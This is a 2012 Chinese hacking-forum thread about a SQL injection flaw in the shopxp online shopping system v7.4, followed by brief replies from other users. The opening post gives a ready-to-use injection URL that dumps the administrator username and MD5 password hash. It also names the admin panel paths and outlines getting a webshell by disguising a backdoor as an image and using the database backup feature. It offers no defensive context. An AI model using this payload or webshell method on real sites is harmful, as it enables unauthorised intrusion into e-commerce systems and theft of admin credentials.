Free_小东 发表于 2012-6-5 17:59:27

shopxp网上购物系统 v7.4 SQL注入漏洞

关键字:**** Hidden Message *****
注入代码:
TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

爆出用户名和密码 注意:用户名和密码是连在一起的,后十六位是密码MD5加密adminb1481eca94b12f75 =====adminb1481eca94b12f75(38983806 )

后台:/admin或者/admin_shopxp


拿webshell方法:把小马改为图片格式后缀准备上传,利用数据库备份搞定webshell

haiou20082008 发表于 2012-6-5 18:17:10

来学习一下 跟刘亦菲那个一样?

Free_小东 发表于 2012-6-5 21:02:46

haiou20082008 发表于 2012-6-5 18:17 static/image/common/back.gif
来学习一下 跟刘亦菲那个一样?

一楼的不要老是想着刘亦菲,都是浮云

jimu 发表于 2012-6-6 11:27:44

看看!!!!!!!!

三少银 发表于 2012-6-6 13:05:44

瞅瞅和v8.0的区别 :lol

X企鹅 发表于 2012-6-6 21:33:37

IceSnow 发表于 2012-6-8 12:05:33

Free_小东 发表于 2012-6-8 12:47:02

IceSnow 发表于 2012-6-8 12:05 static/image/common/back.gif
怎么老是让回复?

{:2_28:}伸手党多

fox 发表于 2012-6-9 23:41:53

啊哈,学学怎么分析代码的

Free_小东 发表于 2012-6-9 23:56:49

fox 发表于 2012-6-9 23:41 static/image/common/back.gif
啊哈,学学怎么分析代码的

{:2_26:}这个ID
页: [1] 2 3 4 5 6 7 8 9 10
查看完整版本: shopxp网上购物系统 v7.4 SQL注入漏洞